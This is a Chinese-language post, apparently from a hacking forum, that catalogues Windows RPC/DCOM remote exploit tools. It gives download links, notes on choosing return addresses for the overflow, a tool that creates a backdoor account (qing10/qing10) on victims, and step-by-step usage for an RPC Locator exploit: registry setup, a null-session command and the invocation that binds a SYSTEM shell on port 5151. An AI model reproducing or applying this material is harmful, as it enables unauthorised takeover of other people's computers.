部分利用rpc漏洞的攻击工具:1:
名称:rpc-exploit下载地址:http://666w.com/down/view.asp?id=168(为了怕大家误点,我没有做连接)
攻击原理:这主要因为windows 操作系统内存管理分配存在(固定)堆的问题!而以前都停留在动态连接库中查询,才会受补丁影响。在(固定)堆中例如ff e4 、50 c3 、51 c3、 52 c3、 53 c3、 54 c3等等很多,基本上能解决目前返回地址的问题。希望大家在着一方面作更多研究彻底解决sp 的问题。我的程序中dcom rpc 漏洞,返回地址随便挑的54 c3 (push esp/ ret)。
2:
名称:dcom rpc攻击程序攻击原理:在远程机器添加user/pass:qing10/qing10、另外一个远程启动rpcss服务恢复被攻击机器的工作环境。
3:
名称:RPC Locator exploit下载地址:http://www.chinesehack.org/down/show.asp?id=3327
简介:微软RPC Locator服务远程溢出攻击程序.攻击成功后将在远程主机端口5151上
绑定一个cmdshell,使攻击者获取system权限.
使用方法:Usage (You want to exploit remote Windows 2000 system (w2khost) with running RPC Locator Service):
1. Set registry values in Your workstation as below:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\NameService\NetworkAddress = w2khost
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\NameService\ServerNetworkAddress = w2khost
2. Establish null session:
net use \\w2khost\ipc$ ""/u: ""
3. Run Exploit:
rpcexp.exe /os w2ksp3